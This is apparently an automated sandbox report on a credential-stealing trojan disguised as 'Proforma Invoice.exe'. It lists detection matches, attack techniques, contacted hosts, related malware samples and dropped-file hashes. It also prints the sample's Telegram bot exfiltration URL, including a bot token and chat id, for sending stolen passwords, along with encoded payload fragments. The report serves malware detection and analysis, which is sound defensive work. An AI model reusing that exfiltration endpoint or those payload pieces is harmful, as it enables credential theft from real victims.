                Source: Yara matchFile source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7324, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice.exe.1e60000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7324, type: MEMORYSTR
                Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice.exe.1e60000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7324, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00716283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00716283
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00716747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00716747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                11
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                121
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager1
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS127
                System Information Discovery
                Distributed Component Object Model121
                Input Capture
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                2
                Valid Accounts
                LSA Secrets231
                Security Software Discovery
                SSH3
                Clipboard Data
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Virtualization/Sandbox Evasion
                Cached Domain Credentials11
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                Access Token Manipulation
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Proforma Invoice.exe53%ReversingLabsWin32.Trojan.Nymeria
                Proforma Invoice.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://api.telegram.org80%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                104.21.67.152
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.orgRegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.org/botRegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org8RegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839RegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://checkip.dyndns.org/qProforma Invoice.exe, 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                      high
                                      http://reallyfreegeoip.orgRegSvcs.exe, 00000001.00000002.4216346327.0000000003132000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://reallyfreegeoip.orgRegSvcs.exe, 00000001.00000002.4216346327.0000000003110000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://checkip.dyndns.orgRegSvcs.exe, 00000001.00000002.4216346327.0000000003110000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4216346327.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://checkip.dyndns.comRegSvcs.exe, 00000001.00000002.4216346327.0000000003110000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://api.telegram.orgRegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.4216346327.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/bot-/sendDocument?chat_id=Proforma Invoice.exe, 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    high
                                                    https://reallyfreegeoip.org/xml/Proforma Invoice.exe, 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4216346327.0000000003110000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      api.telegram.orgUnited Kingdom
                                                      62041TELEGRAMRUfalse
                                                      104.21.67.152
                                                      reallyfreegeoip.orgUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      193.122.6.168
                                                      checkip.dyndns.comUnited States
                                                      31898ORACLE-BMC-31898USfalse
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1580085
                                                      Start date and time:2024-12-23 21:49:05 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 50s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:6
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Proforma Invoice.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@3/4@3/3
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 57
                                                      • Number of non-executed functions: 276
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • VT rate limit hit for: Proforma Invoice.exe
                                                      TimeTypeDescription
                                                      15:50:19API Interceptor10632766x Sleep call for process: RegSvcs.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      149.154.167.220tg.exeGet hashmaliciousBabadedaBrowse
                                                        tg.exeGet hashmaliciousBabadedaBrowse
                                                          setup.exeGet hashmaliciousBabadedaBrowse
                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              user.exeGet hashmaliciousUnknownBrowse
                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                    8v1GZ8v1LF.exeGet hashmaliciousUnknownBrowse
                                                                      HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                        file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                                          104.21.67.152PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              193.122.6.168HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              checkip.dyndns.comHUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 193.122.6.168
                                                                                              PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.130.0
                                                                                              Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 193.122.130.0
                                                                                              rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 193.122.130.0
                                                                                              Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 158.101.44.242
                                                                                              Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 158.101.44.242
                                                                                              Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              Requested Documentation.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 158.101.44.242
                                                                                              YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 193.122.6.168
                                                                                              reallyfreegeoip.orgHUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 172.67.177.134
                                                                                              PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.67.152
                                                                                              MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.67.152
                                                                                              Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 172.67.177.134
                                                                                              rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 172.67.177.134
                                                                                              Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 172.67.177.134
                                                                                              Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.67.152
                                                                                              Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.67.152
                                                                                              YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 172.67.177.134
                                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 104.21.67.152
                                                                                              api.telegram.orgtg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 149.154.167.220
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 149.154.167.220
                                                                                              setup.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 149.154.167.220
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 149.154.167.220
                                                                                              user.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                              • 149.154.167.220
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                              • 149.154.167.220
                                                                                              8v1GZ8v1LF.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                              • 149.154.167.220
                                                                                              2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                              • 149.154.167.220
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              ORACLE-BMC-31898USHUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 193.122.6.168
                                                                                              MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.130.0
                                                                                              Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 193.122.130.0
                                                                                              rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 193.122.130.0
                                                                                              nshkmips.elfGet hashmaliciousMiraiBrowse
                                                                                              • 132.145.36.70
                                                                                              Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 158.101.44.242
                                                                                              Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 158.101.44.242
                                                                                              nshkarm.elfGet hashmaliciousMiraiBrowse
                                                                                              • 140.238.15.102
                                                                                              nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                              • 140.238.98.44
                                                                                              Requested Documentation.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 158.101.44.242
                                                                                              TELEGRAMRUChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.99
                                                                                              YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.99
                                                                                              gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 149.154.167.220
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 149.154.167.220
                                                                                              setup.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 149.154.167.220
                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                              • 149.154.167.99
                                                                                              CLOUDFLARENETUSHUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 172.67.177.134
                                                                                              PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.67.152
                                                                                              https://www.canva.com/design/DAGaHpv1g1M/bVE7B2sT8b8T3P-e2xb64w/view?utm_content=DAGaHpv1g1M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h1ee3678e45Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 172.67.74.152
                                                                                              Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.18.20.226
                                                                                              Play Aud.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 104.17.25.14
                                                                                              https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                              • 104.18.35.227
                                                                                              Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.20.87.8
                                                                                              vFile__0054seconds__Airborn.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              https://jkqbjwq.maxiite.comGet hashmaliciousUnknownBrowse
                                                                                              • 104.16.123.96
                                                                                              [External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.emlGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              54328bd36c14bd82ddaa0c04b25ed9adHUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.67.152
                                                                                              PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.67.152
                                                                                              MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.67.152
                                                                                              Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.67.152
                                                                                              rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.67.152
                                                                                              Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.67.152
                                                                                              Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.67.152
                                                                                              Browser.Daemon.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.67.152
                                                                                              Browser.Daemon.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.67.152
                                                                                              Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.67.152
                                                                                              3b5074b1b5d032e5620f69f9f700ff0eWO.exeGet hashmaliciousMetasploitBrowse
                                                                                              • 149.154.167.220
                                                                                              ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.220
                                                                                              payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              1lhZVZx5nD.exeGet hashmaliciousStealc, VidarBrowse
                                                                                              • 149.154.167.220
                                                                                              Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                              • 149.154.167.220
                                                                                              Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              No context
                                                                                              Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                              File Type:ASCII text, with very long lines (28674), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):28674
                                                                                              Entropy (8bit):3.584265757282919
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:G3i/suPhEVsHCJOG+gwp5Jm6fqL0Jl1ofnQ1uLphM:Ui0uPhbiJOVpuLDM
                                                                                              MD5:2323A1858B32A2E16D291E717425110C
                                                                                              SHA1:E55A21BCC7289123D82303A7BA62787025F8F169
                                                                                              SHA-256:E845FD6FC71F2CA92289972109C55E1F0E8426561848CBD53A936C2E0590452C
                                                                                              SHA-512:DEA42A7B47062FB237A8377F90860000BC8A6683EDAAD188A4E3B6FD0D443A2B7DB271F49BD2BBEF8B3361980F50100F0CE1F117DFE3FFDE9640B1A048781017
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:x055b8ce18cecc20000065758bb6000000669854489b560000006698d468ab27000000669855888be6000000669854a89b560000006698d4c8abc6000000669855e88b33000000669854099b230000006698d429abe2000000669855498b46000000669854699bc60000006698d489abc6000000669855a9330c669854c99be60000006698d844ffffffab4700000066985964ffffff8b4600000066985884ffffff9bc60000006698d8a4ffffffabc6000000669859c4ffffff8be2000000669858e4ffffff9b460000006698d805ffffffabc600000066985925ffffff8bc600000066985845ffffff339c6698d865ffffffab570000006698550d8b370000006698542d9b560000006698d44dab270000006698556d8b330000006698548d9b230000006698d4adabe2000000669855cd8b46000000669854ed9bc60000006698d40eabc60000006698552e330c6698544e9b160000006698d886ffffffab46000000669859a6ffffff8b67000000669858c6ffffff9b160000006698d8e6ffffffab0700000066985907ffffff8b9600000066985827ffffff9b330000006698d847ffffffab2300000066985967ffffff8be200000066985887ffffff9b460000006698d8a7ffffffabc6000000669859c7ffffff8bc6000000669858e7ffffff339c6698d408ab370000006698550a8b86
                                                                                              Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):67870
                                                                                              Entropy (8bit):7.907921822138917
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:t4mKMSlcyCGkkFw05Ra5oIH6QR8kDIQok6/KJ6Kjnl:em7lyCGkFv5XH18S7oTW6KLl
                                                                                              MD5:4037A07080238335F92A5D22249E73AC
                                                                                              SHA1:693EACA68F21D3EC3A4FCB3B9927D4128C4B0D75
                                                                                              SHA-256:83987C41548AFE4935777F3601B7484AA5960ACE0C033BB286E02B900C3D9B58
                                                                                              SHA-512:440FC42CC56F14F4AB3FE4B873AADD02A5EC170F49DC4527AA578262B7EF9FFFFD3C93FB2FD1BE55E72646E20381128481DC7B6EF745510A14909C1ECCAE379D
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:EA06..n..Z....M.P...^..G..h.*uj.P..g3.u2..4U....j.G...f..5....:...4_.3.o.Q...'...3...aY.E'3.L.U1.K'.i..w..H-.{.z.;..$...r.a.N.N!9........#..4kK2.V...VsU..*s..,N...=...h~...E.cN..A....x.i.... ......j.G.E..fT.P..).......hw..Un@..f.M.Q.:.leJsA.......mZ.0...:.C..@.;..M'.....8...........'z.P..b.9..`.h.N_..B..4O(.._..4._..L..N.R.....&e....P..[|{].<....j3.E6...Ps......hE+Tj..19....? ..sd...7..O|z...P&....M.4.......`.B..hX......g.N&.......'.0..H.h@@.....=.4%.....y.Qh....D.X..:..[).jF.4.Uf.z-.q.Q..y4jcN.t.@[..9A.T:40"".k.Q.\:..cJ.Bg4...8...=..E..)..........6.\.D..J...jJl..5K.\.4`...6.D.@...E..9.....'...9...t.J.3J..o........C.....eN{f..,.j...l......j.T.Ubs{$..K..j.)..Z..m.:,.r.T(u9.n.L...-.._...Xm.z,j...P...:.S.. ....hQm...:.F.^j...:.U..c.j.....Tg7j-.mb..,t:..5X.X.4.N..@..+./H....Z@-..X.x......nqA.V.0.-..2.E...-V#..N.@..r.Q.....:.@.Z.3....y..i...>.T.e.eJ.P.....kd.T.sk..qi..N.:=..N.S*..\.3w.T.v{..n..v..z-..l.V7.Z.Vs3.S....y<..4;.>.0.S.u..^w2..*s.M>Q..
                                                                                              Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                              File Type:data
                                                                                              Category:dropped
